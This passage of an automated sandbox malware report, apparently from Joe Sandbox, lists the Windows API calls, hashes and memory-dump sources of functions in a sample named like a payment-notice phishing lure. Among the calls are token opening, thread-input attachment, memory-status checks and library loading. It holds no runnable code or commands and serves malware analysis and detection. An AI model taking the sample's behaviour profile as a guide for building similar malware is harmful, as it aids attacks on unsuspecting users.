                                                                              • Opcode ID: fd608cb53bff9cf97d7243a7ec6fdd651b0abcb144f5993f9946b8ba25ef21d0
                                                                              • Instruction ID: d841847a67108a2ea3112833f3fa147060fe00ce414e540553646dc330c17d71
                                                                              • Opcode Fuzzy Hash: fd608cb53bff9cf97d7243a7ec6fdd651b0abcb144f5993f9946b8ba25ef21d0
                                                                              • Instruction Fuzzy Hash: 27114572A0461AEBDB10EFA8D889AEE77B8FB45311F408455F905E3140D730BE81DBA1
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008E604C
                                                                              • GetStockObject.GDI32(00000011), ref: 008E6060
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 008E606A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                              • String ID:
                                                                              • API String ID: 3970641297-0
                                                                              • Opcode ID: 36c5b466e80631f0717e948035140b8669665fe0f6a6608aeab72586110585a9
                                                                              • Instruction ID: 969b4dd45832101dfc91160f4e4195fe40922a0464c90db3869f0ec15f0b6223
                                                                              • Opcode Fuzzy Hash: 36c5b466e80631f0717e948035140b8669665fe0f6a6608aeab72586110585a9
                                                                              • Instruction Fuzzy Hash: F711A1B3105958BFEF125F959C44EEA7B69FF293A4F000215FE04A2010D732ACA0EB90
                                                                              APIs
                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 00903B56
                                                                                • Part of subcall function 00903AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00903AD2
                                                                                • Part of subcall function 00903AA3: ___AdjustPointer.LIBCMT ref: 00903AED
                                                                              • _UnwindNestedFrames.LIBCMT ref: 00903B6B
                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00903B7C
                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 00903BA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                              • String ID:
                                                                              • API String ID: 737400349-0
                                                                              • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                              • Instruction ID: d9d04a05a558a5d4e87661a111384c4cb81ed2440adf1066f8ed85861bd27759
                                                                              • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                              • Instruction Fuzzy Hash: 70012972100148BFDF126E95CC42EEB3B7EEF88758F048414FE48A6161C732E961EBA0
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008E13C6,00000000,00000000,?,0091301A,008E13C6,00000000,00000000,00000000,?,0091328B,00000006,FlsSetValue), ref: 009130A5
                                                                              • GetLastError.KERNEL32(?,0091301A,008E13C6,00000000,00000000,00000000,?,0091328B,00000006,FlsSetValue,00982290,FlsSetValue,00000000,00000364,?,00912E46), ref: 009130B1
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0091301A,008E13C6,00000000,00000000,00000000,?,0091328B,00000006,FlsSetValue,00982290,FlsSetValue,00000000), ref: 009130BF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 3177248105-0
                                                                              • Opcode ID: 29e6550fc0d54c0339ffa8e1abbba3386389db7326e54111efbbfcdf5170557e
                                                                              • Instruction ID: db82cb617d733fa7a5555d2a8378b7da7ad4efa039104b8ae15fd85f9583809e
                                                                              • Opcode Fuzzy Hash: 29e6550fc0d54c0339ffa8e1abbba3386389db7326e54111efbbfcdf5170557e
                                                                              • Instruction Fuzzy Hash: C7012B7331962AABCB314B799C449A77BECAF49B71B118734F919E3140DB21DA81C7E0
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0094747F
                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00947497
                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009474AC
                                                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009474CA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                                              • String ID:
                                                                              • API String ID: 1352324309-0
                                                                              • Opcode ID: 6f9005748234e25b60398e92187eb6e20a981398e2872e9f501820f38fe52d43
                                                                              • Instruction ID: e9ab7488021e97411408b474f21860a289b0ef01eedf4359d7cba6696f790b83
                                                                              • Opcode Fuzzy Hash: 6f9005748234e25b60398e92187eb6e20a981398e2872e9f501820f38fe52d43
                                                                              • Instruction Fuzzy Hash: 5E1161B52093199BE7208F94DC09FA2BBFDEB00B04F10896DA65AD6161D774E944DBA0
                                                                              APIs
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0C4
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0E9
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0F3
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B126
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CounterPerformanceQuerySleep
                                                                              • String ID:
                                                                              • API String ID: 2875609808-0
                                                                              • Opcode ID: 1eccaa258968f780cb998c711c3ed4cb51abc13aa4ee7afc22706c241d0e6de1
                                                                              • Instruction ID: e7bcf4dd96550cc6863fbca9265d4c7b83b437186a195b133a7c2326c6581659
                                                                              • Opcode Fuzzy Hash: 1eccaa258968f780cb998c711c3ed4cb51abc13aa4ee7afc22706c241d0e6de1
                                                                              • Instruction Fuzzy Hash: 9A11AD71C0852CEBCF04AFE4E9A8AEEBB78FF4D311F004499D941B2285CB308650DB51
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00942DC5
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00942DD6
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00942DDD
                                                                              • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00942DE4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 2710830443-0
                                                                              • Opcode ID: 482d82fc2d1a954014926f34eba1a0bad468708706c221aabfde6a98da35f7b7
                                                                              • Instruction ID: 20428ff2a092635a595a1d1f9038cf9512ae4f15cdba86cb46be5428b6586653
                                                                              • Opcode Fuzzy Hash: 482d82fc2d1a954014926f34eba1a0bad468708706c221aabfde6a98da35f7b7
                                                                              • Instruction Fuzzy Hash: B8E092B2529224BBD7201B729C4DFEB7E6CFF82BB1F800019F109E10809AA4C880D6B0
                                                                              APIs
                                                                                • Part of subcall function 008F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F9693
                                                                                • Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96A2
                                                                                • Part of subcall function 008F9639: BeginPath.GDI32(?), ref: 008F96B9
                                                                                • Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96E2
                                                                              • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00978887
                                                                              • LineTo.GDI32(?,?,?), ref: 00978894
                                                                              • EndPath.GDI32(?), ref: 009788A4
                                                                              • StrokePath.GDI32(?), ref: 009788B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                              • String ID:
                                                                              • API String ID: 1539411459-0
                                                                              • Opcode ID: b602c19602a10607185733aa5eda29d07ef79c2583ba919e58263344f6aebd99
                                                                              • Instruction ID: 2ce8e17e0c0a71e6095e0c9e4381a31837c61dbc45ebbdf8fcf10d8dd9f7f365
                                                                              • Opcode Fuzzy Hash: b602c19602a10607185733aa5eda29d07ef79c2583ba919e58263344f6aebd99
                                                                              • Instruction Fuzzy Hash: B5F09A36059258BADB122F94AC0DFCA3E19AF06310F408104FA25610E1C7740550EBE6
                                                                              APIs
                                                                              • GetSysColor.USER32(00000008), ref: 008F98CC
                                                                              • SetTextColor.GDI32(?,?), ref: 008F98D6
                                                                              • SetBkMode.GDI32(?,00000001), ref: 008F98E9
                                                                              • GetStockObject.GDI32(00000005), ref: 008F98F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ModeObjectStockText
                                                                              • String ID:
                                                                              • API String ID: 4037423528-0
                                                                              • Opcode ID: 384775dff2d15ae40770c216436728a2649d256ce8ad7197c52e85ebb16e6cac
                                                                              • Instruction ID: 9440b6df6b07719b5f335c4e821fb14f0e4041b7d202c4b4ce2c5d44ea3d5b66
                                                                              • Opcode Fuzzy Hash: 384775dff2d15ae40770c216436728a2649d256ce8ad7197c52e85ebb16e6cac
                                                                              • Instruction Fuzzy Hash: 72E0657225C244ABDB215B74AC09BE87F51EB11335F14822DF6F9540E1C3714680AF10
                                                                              APIs
                                                                              • GetCurrentThread.KERNEL32 ref: 00941634
                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,009411D9), ref: 0094163B
                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009411D9), ref: 00941648
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,009411D9), ref: 0094164F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                              • String ID:
                                                                              • API String ID: 3974789173-0
                                                                              • Opcode ID: a6062547add07b5abd5a1687ebe3db0f7a4f1341b1c78a228133821d707b7347
                                                                              • Instruction ID: 9299f3da4c34e6fc6559056ae48c21ac7cc47af842791698b2bcad03bf39ea8d
                                                                              • Opcode Fuzzy Hash: a6062547add07b5abd5a1687ebe3db0f7a4f1341b1c78a228133821d707b7347
                                                                              • Instruction Fuzzy Hash: 89E08CB3616211EBDB201FA0AE0DF863B7CAF44792F15880CF249E9090E73484C0DBA4
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 0093D858
                                                                              • GetDC.USER32(00000000), ref: 0093D862
                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0093D882
                                                                              • ReleaseDC.USER32(?), ref: 0093D8A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: 8fd2a1393723c9ec78c76351fbb6b65d32d253f87a08863c8b6b672ff16e36ae
                                                                              • Instruction ID: fda12e957e80e70b8df8c0c2227759c317c82227ce61870a2c81ddbc783396f9
                                                                              • Opcode Fuzzy Hash: 8fd2a1393723c9ec78c76351fbb6b65d32d253f87a08863c8b6b672ff16e36ae
                                                                              • Instruction Fuzzy Hash: 97E01AB2814209DFCF41AFA0D84C66DBBB2FB08310F108409E90AE7250CB389981AF40
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 0093D86C
                                                                              • GetDC.USER32(00000000), ref: 0093D876
                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0093D882
                                                                              • ReleaseDC.USER32(?), ref: 0093D8A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: dab6eba6c0469dc8a4890626019911b84f01462f15f17f22a9113acc2d19873b
                                                                              • Instruction ID: c559f1f0c97df5663053f7695e89fdcce655bc580865f92b5ae9134a4d4c649f
                                                                              • Opcode Fuzzy Hash: dab6eba6c0469dc8a4890626019911b84f01462f15f17f22a9113acc2d19873b
                                                                              • Instruction Fuzzy Hash: B1E01AB2C14209DFCF41AFA0D84C66DBBB1FB08310B108008E90AE7250CB385941AF40
                                                                              APIs
                                                                                • Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625
                                                                              • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00954ED4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Connection_wcslen
                                                                              • String ID: *$LPT
                                                                              • API String ID: 1725874428-3443410124
                                                                              • Opcode ID: ec6c1f52a63502fa73881566d2aeda0e1e19a46e66c1db0d94287f17dc8f9932
                                                                              • Instruction ID: ed6704f8af020ce086634de209385a4d1b35505453d452200a4de5c9d3d47bbe
                                                                              • Opcode Fuzzy Hash: ec6c1f52a63502fa73881566d2aeda0e1e19a46e66c1db0d94287f17dc8f9932
                                                                              • Instruction Fuzzy Hash: 9C916E75A002449FCB54DF59C484EAABBF5BF45308F188099E80A9F3A2C735ED89CB91
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 0090E30D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorHandling__start
                                                                              • String ID: pow
                                                                              • API String ID: 3213639722-2276729525
                                                                              • Opcode ID: b35a94105a0340e4549d8c65f20142554fb09c07a8cdc36d9a3fe1c3cef9461c
                                                                              • Instruction ID: 5b373c766d610ffebcac55fcbe91dc8bfef77637cc8f6f861c5530e6610ef16d
                                                                              • Opcode Fuzzy Hash: b35a94105a0340e4549d8c65f20142554fb09c07a8cdc36d9a3fe1c3cef9461c
                                                                              • Instruction Fuzzy Hash: BA512A71B1C10B9ACB157758D9013B9BBFCAB40740F744DA8E0D5823F9DB348CD1AA86
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #
                                                                              • API String ID: 0-1885708031
                                                                              • Opcode ID: e717ab409d63263ced14d3b7242e01489ef5112a3583adef55ffa00cec999152
                                                                              • Instruction ID: 973763f2554f8c97fb1648ce57f7293ec3b38c2acd34a81b7b2f7fb142acdbb7
                                                                              • Opcode Fuzzy Hash: e717ab409d63263ced14d3b7242e01489ef5112a3583adef55ffa00cec999152
                                                                              • Instruction Fuzzy Hash: 1C51237590424ADFDB25DF38C481ABA7BA8FF56310F244055F992DB2E0E7349D82CB91
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 008FF2A2
                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 008FF2BB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemorySleepStatus
                                                                              • String ID: @
                                                                              • API String ID: 2783356886-2766056989
                                                                              • Opcode ID: a0de8d4f6e6bf3c89c06570d08e2ce44dc4cf1151c1d99895cf8f235bd141949
                                                                              • Instruction ID: d781ab6478373b352c4a27999b6b8daa621aac5eae0161118d785a23e9c343e9
                                                                              • Opcode Fuzzy Hash: a0de8d4f6e6bf3c89c06570d08e2ce44dc4cf1151c1d99895cf8f235bd141949
                                                                              • Instruction Fuzzy Hash: 4851787181C7859BD320AF15E886BABBBF8FF85300F81484DF29981195EB718529CB67
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 009657E0
                                                                              • _wcslen.LIBCMT ref: 009657EC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper_wcslen
                                                                              • String ID: CALLARGARRAY
                                                                              • API String ID: 157775604-1150593374
                                                                              • Opcode ID: ce491a35944775644b8e143e4156f4c0ff241be49c077be7e084ea98e7d690f1
                                                                              • Instruction ID: 388e5d830ebafae5d8ae7d4ba4e53881611308d14f0081fc30e77f6392931b78
                                                                              • Opcode Fuzzy Hash: ce491a35944775644b8e143e4156f4c0ff241be49c077be7e084ea98e7d690f1
